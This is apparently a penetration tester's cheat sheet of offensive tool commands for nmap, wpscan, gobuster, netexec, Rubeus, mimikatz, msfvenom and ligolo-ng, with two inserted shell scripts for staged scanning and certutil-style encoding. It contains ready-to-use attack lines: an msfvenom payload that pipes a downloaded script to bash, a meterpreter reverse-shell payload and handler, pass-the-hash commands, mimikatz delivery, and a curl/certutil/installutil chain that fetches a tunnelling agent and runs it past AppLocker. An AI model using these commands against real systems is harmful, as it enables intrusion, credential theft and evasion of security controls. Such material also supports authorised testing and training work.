Tools

autorecon
Basic usage
autorecon TARGET_IP
Scanning multiple hosts
autorecon -t targets.txt
# or run it directly as root against several targets with extra verbosity:
sudo $(which autorecon) TARGET_IP1 TARGET_IP2 TARGET_IP3 -vv

nmap
Base Syntax
nmap {Targets} [ScanType] [Options]
Target
Purpose                  Example
1 target                 nmap IP
scan multiple targets    nmap IP1 IP2 IP3   (space-separated; a comma inside an address is an octet list, e.g. 10.0.0.1,2,3, not a host separator)
scan a list              nmap -iL list.txt
scan CIDR range          nmap 192.168.1.0/24
Ports
Purpose                          Example
Scan top 1k popular ports        nmap IP   (default with no -p: the 1000 most common TCP ports)
Port range                       nmap IP -p x-y
Port list                        nmap IP -p x,y,z
Scan ports in order (no shuffle) nmap IP -r -p x-y   (-r only disables port randomisation; the ports still come from -p)
Probing (host discovery)
Purpose                              Example
Don't probe (treat every host as up) nmap IP -Pn
Default probe                        nmap IP -PB   (legacy alias for the default; with no -P* option nmap sends ICMP echo, TCP SYN to 443, TCP ACK to 80 and an ICMP timestamp request)
ICMP Echo Request                    nmap IP -PE
ICMP Timestamp Request               nmap IP -PP
ICMP Address Mask Request            nmap IP -PM
Scan Type
Purpose                              Example
Host discovery only (no port scan)   nmap IP -sn
SYN Scan                             nmap IP -sS   (needs root; the default when privileged)
TCP Connect Scan                     nmap IP -sT   (the default when unprivileged)
UDP Scan                             nmap IP -sU   (flags are case-sensitive; -su is not a valid scan type)
Version scan                         nmap IP -sV
OS Detection                         nmap IP -O    (needs root; -PM is an ICMP address mask ping, not OS detection)
Set TCP flags                        nmap IP --scanflags SYNFIN   (flag names run together with no colon or commas, any of URG ACK PSH RST SYN FIN, or a numeric value)
Timing Options
Purpose      Example
Paranoid     nmap IP -T0
Sneaky       nmap IP -T1
Polite       nmap IP -T2
Normal       nmap IP -T3   (default)
Aggressive   nmap IP -T4
Insane       nmap IP -T5
Output Format
Purpose       Example
Standard      nmap IP -oN file.txt
Greppable     nmap IP -oG file.txt
XML           nmap IP -oX file.txt
all formats   nmap IP -oA file   (basename; writes file.nmap, file.gnmap and file.xml)
Misc Options
Purpose                                                  Example
Aggressive scan (-O, -sV, -sC and --traceroute in one)   nmap IP -A
reason why a port is in a state                          nmap IP --reason
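A two-stage scan built from the options above, as an added example (not from the original cheat sheet): a fast full-port SYN scan saved in greppable format, then version and script detection against only the ports that came back open. The -oG parser is the reusable part; the scan flags, target and file names are assumptions for illustration, and the sample -oG file is constructed, not real scanner output.

```shell
#!/usr/bin/env bash
# Added example: two-stage nmap workflow (not part of the original cheat sheet).
# Stage 1 scans every TCP port quickly and saves greppable output (-oG);
# stage 2 parses that file and runs -sV/-sC only against the open ports.

# open_ports_from_gnmap FILE
# Prints one line per host that has open ports: "<ip> <port>,<port>,..."
# A -oG port line looks like (constructed example):
#   Host: 10.10.10.5 ()  Ports: 22/open/tcp//ssh///, 443/closed/tcp//https///
open_ports_from_gnmap() {
    awk '/^Host:/ && /Ports:/ {
        host = $2; ports = ""
        for (i = 1; i <= NF; i++) {
            # each entry is port/state/proto/owner/service/rpc/version/
            if ($i ~ /^[0-9]+\/open\//) {
                split($i, f, "/")
                ports = (ports == "" ? f[1] : ports "," f[1])
            }
        }
        if (ports != "") print host, ports
    }' "$1"
}

# two_stage_scan TARGET
# Assumed flags: --min-rate 1000 keeps stage 1 short; lower it for fragile hosts.
two_stage_scan() {
    target=$1
    base="scan_$(printf '%s' "$target" | tr '/' '_')"
    sudo nmap -sS -p- --min-rate 1000 -oG "${base}_all.gnmap" "$target"
    open_ports_from_gnmap "${base}_all.gnmap" | while read -r host ports; do
        sudo nmap -sV -sC -p "$ports" -oA "${base}_${host}_svc" "$host"
    done
}

# Constructed sample -oG file (not real scan output) to exercise the parser.
SAMPLE_GNMAP=$(mktemp)
cat > "$SAMPLE_GNMAP" <<'EOF'
# Nmap 7.94 scan initiated as: nmap -sS -p- -oG - 10.10.10.5 10.10.10.6
Host: 10.10.10.5 ()  Status: Up
Host: 10.10.10.5 ()  Ports: 22/open/tcp//ssh///, 80/open/tcp//http///, 443/closed/tcp//https///  Ignored State: 65532 closed ports
Host: 10.10.10.6 ()  Ports: 445/open/tcp//microsoft-ds///, 3389/filtered/tcp//ms-wbt-server///
# Nmap done at ...
EOF
open_ports_from_gnmap "$SAMPLE_GNMAP"   # prints "10.10.10.5 22,80" then "10.10.10.6 445"
```

Run `two_stage_scan 10.10.10.0/24` on a real engagement; closed and filtered ports are skipped on purpose, so nothing in stage 2 is wasted on ports that will not answer a version probe.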

wpscan
Basic usage
wpscan --url http://TARGET_IP
Enumerate popular plugins (-e ap for all plugins)
wpscan --url http://TARGET_IP -e p
Enumerate users
wpscan --url http://TARGET_IP -e u
Enumerate vulnerable plugins (vulnerability data only comes back with an --api-token; without one the plugins are listed but not flagged)
wpscan --url http://TARGET_IP -e vp
Brute force passwords (with no -U/--usernames given, wpscan enumerates users first and attacks each one)
wpscan --url http://TARGET_IP --passwords /usr/share/wordlists/rockyou.txt

ffuf
Basic Usage
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u http://TARGET_IP:PORT/FUZZ

nikto
Basic usage
nikto -host http://TARGET_IP -p PORT

gobuster
Basic usage
gobuster dir -u http://TARGET_IP:PORT -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt
Enumerating with extensions (filter the extension based on target)
gobuster dir -u http://TARGET_IP:PORT -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,txt,py,html,aspx
Enumerating vhosts (after adding the domain to /etc/hosts; --append-domain appends the URL's domain to each wordlist entry, otherwise the wordlist must contain FQDNs)
gobuster vhost -u http://hostname.domain -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain

netexec
Enumeration
SMB (-H passes the NT hash instead of a password; use -p 'password' for cleartext)
netexec smb targets.txt -u user_name -H 'NTLM_HASH'
netexec smb TARGET_IP -u user_name -H 'NTLM_HASH' --groups --local-groups --loggedon-users --rid-brute --users --shares --pass-pol
winrm (a "Pwn3d!" result means the user can get a shell over WinRM)
netexec winrm targets.txt -u user_name -H 'NTLM_HASH'

powerview
1. Enumerate common names
Get-DomainComputer | select cn

msf
Linux payloads
With commands (the ELF just executes the CMD string; here it fetches a script and pipes it to bash)
msfvenom -p linux/x64/exec CMD='echo I love programming. && curl http://YOUR_IP/shell.php | bash' -f elf -o shellme.elf
Windows (the msfvenom payload and the handler payload must match, including architecture; both are x64 here, and -f csharp emits C# so the file is .cs)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=443 EXITFUNC=thread -f csharp > payload.cs
Catch with
msfconsole -q -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost tun0; set lport 443; set exitfunc thread; exploit -j"

rubeus
Rubeus.exe asktgt /user:username /rc4:NTLM_hash /ptt

powersploit
Reset a user's password (needs a reset-password right such as User-Force-Change-Password or GenericAll on the target; it is noisy, since the user is locked out of their old password)
$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
Set-DomainUserPassword -Identity nina -AccountPassword $UserPassword

mimikatz
You will need to first upload the binaries to the target, either via a meterpreter shell or powershell:
meterpreter
upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe
upload /usr/share/windows-resources/mimikatz/x64/mimidrv.sys
powershell (serve the files over HTTP first; iwr needs a full URL with the scheme, and mimidrv.sys is only needed for the kernel driver commands)
powershell -ep bypass -c iwr http://YOUR_IP/mimikatz.exe -o .\mimikatz.exe
powershell -ep bypass -c iwr http://YOUR_IP/mimidrv.sys -o .\mimidrv.sys

ligolo-ng
You can use the standard apt packages if you don't need to modify the agent, e.g. to bypass AppLocker or Constrained Language Mode (CLM).
sudo apt install ligolo-ng ligolo-ng-common-binaries -y
Basic tunnel
start ligolo-proxy on the attack box (listens on 0.0.0.0:11601 by default)
sudo ligolo-proxy -selfcert
Connect the agent from the pivot host (-ignore-cert because the proxy uses a self-signed certificate)
agent -connect YOUR_IP:11601 -ignore-cert
select the session and list the pivot host's network configuration
#in ligolo-ng
session
ifconfig
set route
1 hop: autoroute creates the tun interface and adds routes for the networks the agent can reach; then start the tunnel
autoroute
start
2 hops: on the first pivot, add a listener that forwards the second agent's connection back to the proxy, point the second agent at the first pivot's IP on port 11601, then repeat session, ifconfig and autoroute for the new session
listener_add --addr 0.0.0.0:11601 --to 127.0.0.1:11601 --tcp
AV evasion (custom-built agent launched through an AppLocker bypass)
Clone the repository
git clone https://github.com/nicocha30/ligolo-ng.git
Edit the defaults of the ignoreCertificate and serverAddr flag variables in ligolo-ng/cmd/agent/main.go so the agent needs no command-line arguments
Compile the agent.exe using the following command
GOOS=windows go build -o agent.exe cmd/agent/main.go
Compile the AppLocker bypass binary as x64 and name it ApplockerBypassExternalBinary.exe - Github Repo
Encode the file created above with certutil
certutil.exe -encode .\ApplockerBypassExternalBinary.exe AppLockerBypassLigolo.txt
Rename the agent.exe to ligolo-agent.exe
Serve the files (ligolo-agent.exe and AppLockerBypassLigolo.txt) over HTTP
Upload the files to the target, decode the bypass binary and run it through installutil.exe (a Microsoft-signed .NET LOLBin; /U runs the assembly's uninstall routine, the usual entry point for InstallUtil-based loaders)
cmd.exe /c curl http://YOUR_IP/ligolo-agent.exe -o C:\users\public\try-agent.exe && curl http://YOUR_IP/AppLockerBypassLigolo.txt -o C:\users\public\enc.txt && certutil -decode C:\users\public\enc.txt C:\users\public\ligolo.exe && del C:\users\public\enc.txt && C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe /logfile= /LogToConsole=true /U C:\users\public\ligolo.exe
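Added example, not from the original page or the ligolo-ng project: the certutil -encode step reproduced on the attack box with coreutils, so the AppLocker bypass binary can be encoded without a Windows host, plus the inverse transform to verify the file round-trips before serving it. File names are assumptions and the sample input is constructed random bytes, not a real binary.

```shell
#!/usr/bin/env bash
# Added example: reproduce certutil -encode on Linux (not from the original page
# or the ligolo-ng project), so the encode step needs no Windows host.
# certutil -encode writes base64 in 64-column CRLF lines between BEGIN/END
# CERTIFICATE markers; certutil -decode on the target reads that layout back.

# certutil_encode INPUT OUTPUT
certutil_encode() {
    {
        printf -- '-----BEGIN CERTIFICATE-----\r\n'
        base64 < "$1" | tr -d '\n' | fold -w 64 | awk '{ printf "%s\r\n", $0 }'
        printf -- '-----END CERTIFICATE-----\r\n'
    } > "$2"
}

# certutil_decode INPUT OUTPUT
# Inverse of the above (what certutil -decode does on the target): drop the
# marker lines and line endings, then base64-decode.
certutil_decode() {
    sed '/^-----/d' "$1" | tr -d '\r\n' | base64 -d > "$2"
}

# certutil_roundtrip_ok INPUT
# Encode, decode and compare bytes; exit status 0 means the file is safe to serve.
certutil_roundtrip_ok() {
    enc=$(mktemp) dec=$(mktemp)
    certutil_encode "$1" "$enc"
    certutil_decode "$enc" "$dec"
    cmp -s "$1" "$dec"
}

# Constructed sample input (random bytes, not a real binary); a real run would
# point at ApplockerBypassExternalBinary.exe instead.
SAMPLE_BIN=$(mktemp)
head -c 300 /dev/urandom > "$SAMPLE_BIN"
certutil_encode "$SAMPLE_BIN" "$SAMPLE_BIN.txt"
certutil_roundtrip_ok "$SAMPLE_BIN" && echo "round-trip ok: $SAMPLE_BIN.txt"
```

The markers are kept on purpose: a plain base64 blob also decodes, but the certificate framing is what makes the file look like the output of certutil's own encode step, which is the form the decode one-liner on the target was written for.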